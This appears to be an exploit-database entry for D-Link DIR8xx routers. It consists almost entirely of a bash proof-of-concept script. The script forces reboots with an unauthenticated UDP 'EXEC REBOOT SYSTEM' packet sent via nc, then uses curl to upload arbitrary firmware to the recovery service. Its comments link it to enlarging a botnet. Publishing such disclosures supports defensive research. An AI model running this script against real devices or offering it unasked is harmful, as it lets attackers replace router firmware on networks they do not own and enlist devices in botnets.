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D-Link DIR8xx Routers - Local Firmware Upload
来源:https://embedi.com 作者:embedi 发布时间:2017-09-18  
#!/bin/bash # If you have access to an ethernet port you can upload custom firmware to a device because system recovery service is started and available for a few seconds after restart. # E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin # E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/update.sh FIRMWARE="firmware.bin" IP="" while true; do T=$(($RANDOM + ($RANDOM % 2) * 32768)) STATUS=`wget -t 1 --no-cache -T 0.2 -O - http://$IP/?_=$T 2>/dev/null` if [[ $STATUS == *"Provided by D-Link"* ]]; then echo "Uploading..." curl -F "data=@$FIRMWARE" --connect-timeout 99999 -m 99999 --output /dev/null http://$IP/f2.htm break elif [[ $STATUS == *"D-LINK"* ]]; then echo "Rebooting..." echo -n -e '\x00\x01\x00\x01EXEC REBOOT SYSTEMaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' | timeout 1s nc -u $IP 19541 fi done
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